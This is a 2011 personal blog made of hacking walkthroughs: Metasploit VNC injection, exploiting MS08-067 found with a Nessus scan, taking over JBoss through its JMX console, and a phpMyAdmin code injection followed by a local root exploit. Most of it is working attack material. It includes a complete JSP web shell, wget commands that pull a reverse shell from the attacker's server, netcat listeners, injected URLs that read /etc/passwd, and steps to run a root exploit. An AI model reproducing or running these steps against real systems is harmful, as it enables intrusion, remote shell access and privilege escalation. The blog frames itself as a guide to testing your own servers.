Saturday, 19 February 2011
How to deploy a VNC session from the target machine
Hi everyone, this is a continuation of my last post, in this one I will show how to grab the display from a remote desktop using metasploit.
1) First thing is find a machine that has a vulnerability to be exploited like I did on the last post.
2) Ok, now that we have our meterpreter, we just need to run our exploit with the vnc_reverse payload
3) set RHOST 192.168.127.199
4) set payload windows/vncinject/reverse_tcp
5) set LPORT 5555
6) exploit
And that's it , if you have any questions, just let me know.
Thanks for watching.
How to hack with nessus + metasploit from start to finish.
1) Download nessus from http://www.nessus.org and register it, its free and easy.
2) Install the server and client version in your PC
3) Start the server , register ir and update the plugins
4) Download backtrack from www.backtrack-linux.org/ , install in a VM or in your PC
5) Start your nessus client, and connect to your server
6) Click on the "+" on the left side and ADD the target server
7) On the right side, click "+" and add new policy and click SAVE
8) Click on the target on the left side, now click on the plugins on the right side and click SCAN NOW
9) Now click on the reports and "+" on the target, you will see all the problems.
10) Copy the CVE ID of a RED problem : EX -> CVE-2008-4250
11) Go to : http://www.metasploit.com/modules/ and type your CVE id on the field CVE and click "SEARCH MODULES"
12) Scroll down and look with module should be used, in this case is "ms08_067_netapi"
13) Now go to your backtrack and type : msfconsole
14) Now type "use exploit/windows/smb/ms08_067_netapi"
15) Now type set RHOST 192.168.127.199 ( in my case is this the TARGET IP, yours will be different)
16) Now type "exploit"
17) You will be prompted with the "meterpreter" if the exploit worked , now you can do a lot of cool things like hashdump,keylogger,download files, upload files,edit/view files
add routes, view ips, kill process, reboot , etc etc, type "help" and you will see everything you can do.
That's it, now watch my video and see how I dit it.
If you have any questions, just put as comment!
Thanks for watching.
How to hack ANY version of JBOSS
Hi everyone, in this post I will explain how to hack ANY version of JBOSS and get root to the target machine.
1) Browse the target machine : http://mytargettest.com:8080
2) Click on the JMX-CONSOLE, if you can see the page, that's great.
3) Now you need to create a war file with our shell.
3.1) mkdir WEB-INF
3.2)vi cmd.jsp and insert this:
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
3.3)vi WEB-INF/web.xml and insert this:
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
3.4) now you have to compile it : jar cvf cmd.war WEB-INF cmd.jsp
3.5) Move this file to your pentest webserver, you will need to download this file to the target machine.
4) Now browse http://mytargettest.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
5) Search for "void addURL()"
6) Insert the address for your war file , in my case : http://172.16.1.79/exploits/cmd.war and click INVOKE
7) It will take about 1min , then you can browse your application http://mytargettest.com:8080/cmd/cmd.jsp
8) Now you just need to type the commands like.. "id" , if you are not root, then you need to find a exploit to root the machine
9) Meanwhile you can get shell to the machine doing this
10) Download to the machine a reverse shell : wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell
11) chmod +x /tmp/airwolf_reverse_shell
12) prepare your pentest machine to get the reverse shell : nc -l -p 8080 -vvv
13) Run the reverse shell on the target machine : /tmp/airwolf_reverse_shell
14) you are now connected to the server.
Thanks for watching.
Friday, 11 February 2011
SQL Injection on phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
CVE: CVE-2009-1151
Remote: Yes
Local: No
ROOT
CVE-2010-3847
Remote: No
Local: Yes
0) Download the php exploit from http://securityreason.com/exploitalert/6399
Donwload the get_root exploit from http://seclists.org/fulldisclosure/2010/Oct/257
1) Run the exploit against the target machine.
[root@bt]# ./php_exploit http://mytargettest.com/phpMyAdmin/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/exploit.29597.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
http://mytargettest.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com
2) Great, that means it worked, now you can type commands on the target machine.
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/var
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=cat+/etc/passwd
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=touch+/tmp/test
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/tmp/test ( Make sure you can write in there and the file is there.
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell (Download your rev_shell)
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=chmod+777+/tmp/airwolf_reverse_shell (change the permissions to execute)
3) Now you have your exploit in the target machine ready to run, this exploit is just a reverse shell
so, in my machine I run this :
nc -l -p 8080 -vvv
4) Now I execute my reverse shell to connect to my machine
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=/tmp/airwolf_reverse_shell
5) Great, now you have a shell, next step is get root.
id
6) cd /tmp/ ; mkdir hack ; cd hack
wget http://172.16.1.79/exploits/get_root
wget http://172.16.1.79/exploits/payload.c
7) Run the exploit to get root and that's it.
chmod +x ./get_root
./get_root
id
Games over!
My first post.
Hi everyone , the idea of this blog is to help people to learn how to do pentest against their own servers in a really easy way... or just for the curious people that just want to see how things are done behind the scene :)
I will be revealing here the latest released exploits and do Proof of Concept ( POC) of them, that's why my blog is called like that ;)
All my posts will contain videos showing everything that you need to know and do to exploit the vulnerabilities, including the links to download all the tools that you need.
That's it then, next post I will explain how to get root using phpmyadmin !
I will be revealing here the latest released exploits and do Proof of Concept ( POC) of them, that's why my blog is called like that ;)
All my posts will contain videos showing everything that you need to know and do to exploit the vulnerabilities, including the links to download all the tools that you need.
That's it then, next post I will explain how to get root using phpmyadmin !
Subscribe to:
Posts (Atom)